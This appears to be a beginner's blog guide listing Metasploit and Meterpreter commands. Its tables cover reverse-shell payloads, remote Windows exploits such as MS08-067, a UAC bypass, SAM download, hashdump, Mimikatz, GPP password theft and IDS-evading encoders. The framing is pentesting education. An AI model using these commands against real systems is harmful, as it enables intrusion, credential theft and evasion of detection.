Metasploit one of the most favorite tool for hacker and pentesters, was developed by H.D. Moore in Perl which later in 2007 was revised in Ruby completely. After it’s high success and demand to security researchers and pen-testers, in 2009, Rapid7 a security company announced that they acquired the Metasploit and now it’s on-board to Rapid7. Learn metasploit commands in this metasploit for beginners guide.
Metasploit is a complete tool-set for penetration testers as it has all the pen-testing tools for breaking into a remote system and web applications. It’s the most advanced and powered tool for security research. It’s a large framework that each module have tons of actions. To make it easier for new users, we here listed some of the most used metasploit commands meterpreter payloads that you can practice and perform.
Metasploit for Beginners
There’s three types of Metasploit commands.
- Basic commands (These are the basic operation commands like search, help, info and exit.)
- Exploit commands (Exploit commands are the ones used to check out all the exploit options, payloads and targets.)
- Exploit execution commands (These are post exploit commands that exploits and execute different operations on a target machine.)
All the most commonly used and Metasploit Basic, Exploit and Exploit Execuation commands for beginners to learn are:
- First of all is the command to update Metasploit framework to it’s latest version.
apt update; apt install metasploit-framework
- It’s a help command to know about msfconsole and check out it’s all options and commands.
msfconsole/help
- Metasploit search command is for searching exploits and vulnerabilities from msfconsole.
search
- To display all the options of a payload to attack a target machine.
show options
- This command is use to check and set listening IP and PORT of the HOST machine to set a statick IP and port forwarding to any specified port.
LHOST
LPORT
- This command is used to list all the payloads for an exploit.
show payloads
- To list down all the vulnerable operating systems to a specified exploit.
show targets
- To show advanced options and commands for exploit.
show advanced
- Show encoders command returns all the encoders. Encoders used for evading simple IDS/IPS signatures that are looking for certain bytes of your payload.
show encoders
- This command will give a list of Nop generators. It is used to change the pattern of a NOP sled in order to bypass simple IDS/IPS signatures of common NOP.
show nops
Metasploit Commands, Meterpreter Payloads
Windows reverse meterpreter payload
| Command | Description |
|---|---|
| set payload windows/meterpreter/reverse_tcp | Reverse TCP Windows Payload |
Android reverse meterpreter payload
| Command | Description |
|---|---|
| set payload android/meterpreter/reverse_tcp | Reverse TCP Android Payload |
Windows VNC Meterpreter payload
| Command | Description |
|---|---|
| set payload windows/vncinject/reverse_tcpset ViewOnly false | Reverse TCP Windows VNC Payload |
Linux Reverse Meterpreter payload
| Command | Description |
|---|---|
| set payload linux/meterpreter/reverse_tcp | Reverse TCP Linux Payload |
Meterpreter Commands
All most useful and commonly used meterpreter commands.
| Command | Description |
|---|---|
| upload file c:\\windows | Meterpreter command for uploading file in a Windows target machine |
| download c:\\windows\\repair\\sam /tmp | Meterpreter command for downloading file from a Windows target machine |
| execute -f c:\\windows\temp\exploit.exe | To execute exploits on a remote target system. |
| execute -f cmd -c | To create a new channel with cmd shell |
| ps | Shows Meterpreter processes |
| shell | Meterpreter get shell on the target |
| getsystem | This meterpreter command attempts priviledge escalation the target |
| hashdump | It dumps hashes on the target machine |
| portfwd add –l 3389 –p 3389 –r target | Meterpreter command to do port forwarding to target machine |
| portfwd delete –l 3389 –p 3389 –r target | Meterpreter remove port forwarding |
Metasploit Exploits
Here you can find all the most commonly used metasploit exploits.
Remote Windows Metasploit Exploits
All the exploits for attacking a Windows system remotely.
| Command | Description |
|---|---|
| use exploit/windows/smb/ms08_067_netapi | Remote Exploit for MS08_067 Windows 2k, XP, 2003 |
| use exploit/windows/dcerpc/ms06_040_netapi | Remote Exploit for MS08_040 Windows NT, 2k, XP, 2003 |
| use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index |
Remote Exploit for MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) |
Local Windows Metasploit Exploits
Exploits to work with a local machine.
| Command | Description |
|---|---|
| use exploit/windows/local/bypassuac | UAC Bypass on Windows 7 systems |
Auxilary Metasploit Modules
| Command | Description |
|---|---|
| use auxiliary/scanner/http/dir_scanner | Metasploit scanner tool to scan HTTP directory |
| use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS for vulnerability scanning |
| use auxiliary/scanner/mssql/mssql_login | Metasploit Credential Scanner for MSSQL |
| use auxiliary/scanner/oracle/oracle_login | Metasploit scanner for Oracle Login Module |
Metasploit Powershell Exploits
| Command | Description |
|---|---|
| use exploit/multi/script/web_delivery | Metasploit shell payload delivery exploit |
| post/windows/manage/powershell/exec_powershell | Upload shell to target and run powershell |
| use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy |
| use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload |
Post Exploit Windows Metasploit Modules
| Command | Description |
|---|---|
| run post/windows/gather/win_privs | Metasploit command to show privileges of the current user |
| use post/windows/gather/credentials/gpp | This Metasploit command grabs all GPP saved passwords |
| load mimikatz -> wdigest | Metasplit loads Mimikatz |
| run post/windows/gather/local_admin_search_enum | Searches all the machines with administrative access |
These are all the basic metasploit commands for beginners to get started with metasploit. It’s much more than this. But to go ahead, this would be a really good helping hand in the path of penetration testing.